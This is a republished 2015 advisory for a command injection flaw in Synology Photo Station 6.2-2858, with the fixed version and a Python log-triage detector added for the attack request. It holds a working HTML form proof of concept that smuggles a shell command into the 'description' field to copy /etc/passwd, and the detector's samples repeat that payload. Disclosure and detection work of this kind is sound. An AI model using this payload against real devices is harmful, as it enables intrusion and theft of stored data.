KhiZaRix

Command injection vulnerability in Synology Photo Station 6.2-2858



------------------------------------------------------------------------
Command injection vulnerability in Synology Photo Station
------------------------------------------------------------------------
Han Sahin, May 2015

------------------------------------------------------------------------
Abstract
------------------------------------------------------------------------
A command injection vulnerability was found in Synology Photo Station,
which allows an attacker to execute arbitrary commands with the
privileges of the webserver. An attacker can use this vulnerability to
compromise a Synology DiskStation NAS, including all data stored on the
NAS.

------------------------------------------------------------------------
Tested version
------------------------------------------------------------------------
This issue was tested on Synology Photo Station version 6.2-2858.

------------------------------------------------------------------------
Fix
------------------------------------------------------------------------
Synology reports that this issue has been resolved in Photo Station
version 6.3-2945.
https://www.synology.com/en-us/releaseNote/PhotoStation

------------------------------------------------------------------------
Details
------------------------------------------------------------------------
https://www.securify.nl/advisory/SFY20150502/command_injection_vulnerability_in_synology_photo_station.html

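------------------------------------------------------------------------
Proof of concept
------------------------------------------------------------------------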

The following proof of concept copies the /etc/passwd file to /var/services/photo/Securify.txt.

<html>
<body>
<form action="http://<target>/photo/webapi/photo.php" method="POST">
<input type="hidden" name="id" value="photo_536168696e_53637265656e2053686f7420323031352d30352d31302061742032322e33342e33352e706e67" />
<input type="hidden" name="description" value="| cat /etc/passwd > /var/services/photo/Securify.txt " />
<input type="hidden" name="api" value="SYNO.PhotoStation.Photo" />
<input type="hidden" name="method" value="edit" />
<input type="hidden" name="version" value="1" />
<input type="hidden" name="ps_username" value="admin" />
<input type="hidden" name="" value="" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>

Source: http://dl.packetstormsecurity.net/1505-exploits/synologyphotostation-exec.txt
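
A log-triage check for the request shape used in the proof of concept above, added here as an example; it is not part of the original post or the advisory. It assumes POST bodies to the Photo Station web API are captured (for example by a reverse proxy), and the metacharacter set, the function names and the nas.example host are illustrative assumptions.

```python
import re
from urllib.parse import parse_qs, urlencode, urlsplit

API_PATH = "/photo/webapi/photo.php"
# Assumed heuristic: shell control operators, redirections and substitutions.
# It favours recall, so a caption such as "Tom & Jerry" is flagged for review.
SHELL_META = re.compile(r"[|;&`<>\n]|\$[({]")


def decode_photo_id(photo_id):
    """Split 'photo_<hex>_<hex>' into its two hex-decoded parts, else None."""
    parts = photo_id.split("_")
    if len(parts) != 3 or parts[0] != "photo":
        return None
    try:
        return tuple(bytes.fromhex(p).decode("utf-8", "replace") for p in parts[1:])
    except ValueError:
        return None


def inspect_request(method, url, body):
    """Return a finding for a suspicious SYNO.PhotoStation.Photo edit call, else None."""
    if method.upper() != "POST" or urlsplit(url).path != API_PATH:
        return None
    form = {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}
    if form.get("api") != "SYNO.PhotoStation.Photo" or form.get("method") != "edit":
        return None
    description = form.get("description", "")
    hits = sorted(set(SHELL_META.findall(description)))
    if not hits:
        return None
    return {"metachars": hits, "photo": decode_photo_id(form.get("id", "")),
            "description": description}


# Constructed sample requests: a benign caption edit, then the fields of the PoC form.
_BASE = {"api": "SYNO.PhotoStation.Photo", "method": "edit", "version": "1",
         "id": "photo_536168696e_53637265656e2053686f7420323031352d30352d"
               "31302061742032322e33342e33352e706e67"}
SAMPLES = [
    ("POST", "http://nas.example/photo/webapi/photo.php",
     urlencode({**_BASE, "description": "Holiday 2015"})),
    ("POST", "http://nas.example/photo/webapi/photo.php",
     urlencode({**_BASE, "description":
                "| cat /etc/passwd > /var/services/photo/Securify.txt "})),
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_request(*sample))
```

A hit is a reason to check the installed Photo Station version against the fixed release (6.3-2945) and to look for unexpected files under /var/services/photo/.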
